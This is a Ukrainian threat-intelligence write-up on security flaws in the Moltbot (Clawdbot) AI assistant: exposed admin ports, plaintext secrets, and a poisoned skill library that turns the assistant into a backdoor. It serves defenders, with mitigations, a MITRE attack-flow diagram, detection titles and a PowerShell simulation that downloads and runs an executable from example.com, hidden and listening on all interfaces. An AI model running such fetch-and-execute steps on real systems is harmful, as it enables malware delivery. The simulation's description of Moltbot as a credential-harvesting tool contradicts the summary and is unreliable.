Стежити
Резюме
У статті висвітлено проблеми безпеки, які виникають навколо персонального асистента ШІ, спочатку відомого як Clawdbot, а згодом перейменованого на Moltbot. Moltbot працює через месенджери, такі як WhatsApp та Telegram, причому багато його застосувань доступні з інтернету з слабкою або відсутньою автентифікацією. Він зберігає облікові дані користувача у текстових файлах, а його бібліотека навичок може бути скомпрометована, що створює загрозу ланцюга постачання. Зловмисники можуть вкрасти секрети, ексфільтрувати вихідний код і використовувати асистента як бекдор.
Дослідження
Дослідники виявили сотні екземплярів Moltbot, що відкривають неавтентифіковані адміністративні порти та небезпечні конфігурації проксі. Доказова атака на ланцюг постачання завантажила шкідливу навичку до бібліотеки ClawdHub, демонструючи віддалене виконання команд для користувачів нижчого рівня. Аналітики також помітили, що секрети зберігаються в текстових файлах Markdown і JSON, що робить їх легкою здобиччю для інфостілеров, таких як RedLine, Lumma і Vidar.
Заходи по зменшенню ризиків
Оператори повинні вимагати сильну автентифікацію для всіх сервісів Moltbot, закривати або фільтрувати адміністративні порти та уникати відкриття асистента в інтернеті. Необхідно увімкнути шифрування при збереженні секретів, ізолювати або контейнеризувати середовище виконання та обмежувати доступ до файлової системи. Перевіряйте, підписуйте та закріпляйте будь-які з навичок, отриманих з бібліотеки, і розгляньте можливість відключення функції навичок, якщо її безпечно керувати не можна.
Відповідь
Попередження про відкриття адміністративних портів та спроби неавтентифікованого доступу до Moltbot. Слідкуйте за процесом AI на предмет несподіваного виконання команд і вихідних з’єднань з невідомими доменами C2. Проскануйте хости на наявність шкідливих програм для крадіжки облікових даних і перевірте цілісність збережених конфігураційних файлів. Якщо компрометація підтверджена, ізолюйте систему, скасуйте опубліковані облікові дані та перевстановіть Moltbot з посиленими налаштуваннями.
%% Class Definitions classDef technique fill:#ffcc99 classDef actor fill:#99ff99 classDef asset fill:#ccccff classDef process fill:#ff9999 %% Nodes actor_attacker[“<b>Субʼєкт</b>: Зловмисник”] class actor_attacker actor asset_moltbot[“<b>Актив</b>: Інстанс Moltbot<br/><b>Вразливість</b>: Адмін-порт без автентифікації”] class asset_moltbot asset tech_external_remote[“<b>Техніка</b> – T1133: Зовнішні Віддалені Сервіси<br/><b>Опис</b>: Використання публічно доступних сервісів”] class tech_external_remote technique tech_exploit_remote[“<b>Техніка</b> – T1210: Експлуатація Віддалених Сервісів<br/><b>Опис</b>: Використання вразливостей для виконання команд”] class tech_exploit_remote technique tech_remote_access[“<b>Техніка</b> – T1219: Засоби Віддаленого Доступу<br/><b>Опис</b>: Подальше керування скомпрометованою системою”] class tech_remote_access technique tech_hijack_execution[“<b>Техніка</b> – T1574: Перехоплення Потоку Виконання<br/><b>Опис</b>: Отруєння довірених компонентів”] class tech_hijack_execution technique asset_malicious_skill[“<b>Актив</b>: Шкідливий Skill<br/><b>Розташування</b>: Бібліотека ClawHub”] class asset_malicious_skill asset tech_content_injection[“<b>Техніка</b> – T1659: Інʼєкція Контенту<br/><b>Опис</b>: Вставка шкідливого коду в легітимний контент”] class tech_content_injection technique process_payload[“<b>Процес</b>: Шкідливе Навантаження<br/><b>Дія</b>: Виконується на хостах Moltbot”] class process_payload process tech_credentials_files[“<b>Техніка</b> – T1552.001: Облікові Дані у Файлах<br/><b>Опис</b>: Отримання відкритих облікових даних”] class tech_credentials_files technique tech_system_services[“<b>Техніка</b> – T1569: Системні Служби<br/><b>Опис</b>: Закріплення через системні сервіси”] class tech_system_services technique asset_c2_server[“<b>Актив</b>: C2 Сервер Зловмисника<br/><b>Роль</b>: Прийом даних та облікових даних”] class asset_c2_server asset tech_exfiltration[“<b>Техніка</b> – T1041: Ексфільтрація через C2<br/><b>Опис</b>: Передача викрадених даних”] class tech_exfiltration technique %% Connections actor_attacker –>|виявляє| asset_moltbot asset_moltbot –>|дозволяє| tech_external_remote tech_external_remote –>|призводить до| tech_exploit_remote tech_exploit_remote –>|використовує| tech_remote_access tech_remote_access –>|запускає| tech_hijack_execution tech_hijack_execution –>|отруює| asset_malicious_skill asset_malicious_skill –>|інʼєктує код у| tech_content_injection tech_content_injection –>|доставляє| process_payload process_payload –>|зчитує| tech_credentials_files tech_credentials_files –>|живить| tech_system_services tech_system_services –>|забезпечує стійкість і виконує| process_payload process_payload –>|підключається до| asset_c2_server asset_c2_server –>|отримує через| tech_exfiltration
Потік Атаки
Виявлення
Можлива спроба установки Moltbot (колишній Clawdbot) (через проксі)
Переглянути
Можлива спроба установки Moltbot (колишній Clawdbot) (через file_event)
Переглянути
Можлива спроба установки Moltbot (колишній Clawdbot) (через dns)
Переглянути
Можлива спроба установки Moltbot (колишній Clawdbot) (через cmdline)
Переглянути
Виявлення екземплярів Moltbot, відкритих у веб [Webserver]
Переглянути
Виконання симуляції
Попередня умова: контрольна перевірка телеметрії та базових параметрів повинна бути пройдена.
-
Нарратив атаки та команди:
Червона команда розгортає Moltbot (інструмент для збору облікових даних з відкритим доступом) на зломленому хості Windows. Запустивши Moltbot з його стандартною конфігурацією, він відкриває неавтентифіковану адміністративну консоль HTTP на порту 8080 , що рекламує “відкритий в інтернет” у своєму банері. Це створює події мережевого з’єднання, які відповідають дослівним строкам правила виявлення. Зловмисник потім отримує доступ до UI з зовнішньої IP, щоб підтвердити відкриття, подальше генеруючи необхідну телеметрію.- Завантажити Moltbot (симулюється за допомогою zip-заповнювача).
- Розархівуйте та запустіть двійковий файл зі стандартними прапорцями (
--listen 0.0.0.0:8080). - Опціонально здійсніть HTTP GET із зовнішньої IP (симулюється через
Invoke-WebRequest).
-
Сценарій регресійного тестування:
# ---------------------------------------------------- # Симуляція відкриття Moltbot – PowerShell # ---------------------------------------------------- # 1. Створіть тимчасовий каталог $tempDir = "$env:TEMPMoltbotSim" New-Item -ItemType Directory -Force -Path $tempDir | Out-Null # 2. Імітуйте завантаження виконуваного файлу Moltbot (заповнювач) $molExe = "$tempDirmolbot.exe" Invoke-WebRequest -Uri "https://example.com/moltbot.exe" -OutFile $molExe -UseBasicParsing # 3. Запустіть Moltbot зі стандартними (вразливими) налаштуванням $proc = Start-Process -FilePath $molExe ` -ArgumentList "--listen 0.0.0.0:8080" ` -PassThru ` -WindowStyle Hidden Write-Host "[+] Moltbot запущений (PID: $($proc.Id)), слухає на 0.0.0.0:8080" # 4. Зачекайте короткий період, щоб дозволити сервісу зареєструватися в журналах Start-Sleep -Seconds 5 # 5. Імітуйте зовнішнє з'єднання для генерації мережевого трафіку Try { Invoke-WebRequest -Uri "http://$($env:COMPUTERNAME):8080" -UseBasicParsing -TimeoutSec 5 Write-Host "[+] Надано зовнішній HTTP запит до UI Moltbot." } Catch { Write-Warning "[-] Неможливо дістатися до UI Moltbot (може бути заблоковано брандмауером)." } # 6. Тримайте процес живим для додаткового ведення журналу (опціонально) Start-Sleep -Seconds 20 # 7. Очистка – зупиніть Moltbot Stop-Process -Id $proc.Id -Force Remove-Item -Recurse -Force $tempDir Write-Host "[+] Симуляція Moltbot завершена й очищена." -
Команди очищення:
# Примусово завершити будь-які залишкові процеси Moltbot та видалити тимчасові файли Get-Process -Name "molbot" -ErrorAction SilentlyContinue | Stop-Process -Force Remove-Item -Path "$env:TEMPMoltbotSim" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "Очищення завершено."